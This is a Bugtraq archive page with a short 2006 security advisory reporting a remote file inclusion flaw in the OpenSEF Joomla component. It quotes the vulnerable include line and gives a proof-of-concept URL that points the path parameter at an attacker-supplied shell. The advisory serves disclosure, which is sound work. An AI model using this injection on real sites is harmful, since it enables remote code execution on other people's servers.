Bugtraq mailing list archives
Modification For OpenSEF Remote file Inclusion
From: Outlaw () aria-security net
Date: 19 Aug 2006 01:18:24 -0000
########################################################################################### # Aria-Security.net Advisory # # Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > # # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp # # # ########################################################################################### #Software: OpenSEF #Attack method: Remote File Inclusion #Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly) #Source: require_once( $mosConfig_absolute_path . '/includes/sef.php' ); } else { // Joomla!'s SEF option is turned off; revert to Joomla!'s original-style // ************************************************************************************ #Proof of Concept: #http://www.site.com/sef.php?mosConfig_absolute_path=SHELL # #---------------------------------------------------------- # # #Contact : Outlaw () aria-security net
Current thread:
- Modification For OpenSEF Remote file Inclusion Outlaw (Aug 19)
- Re: Modification For OpenSEF Remote file Inclusion Carsten Eilers (Aug 24)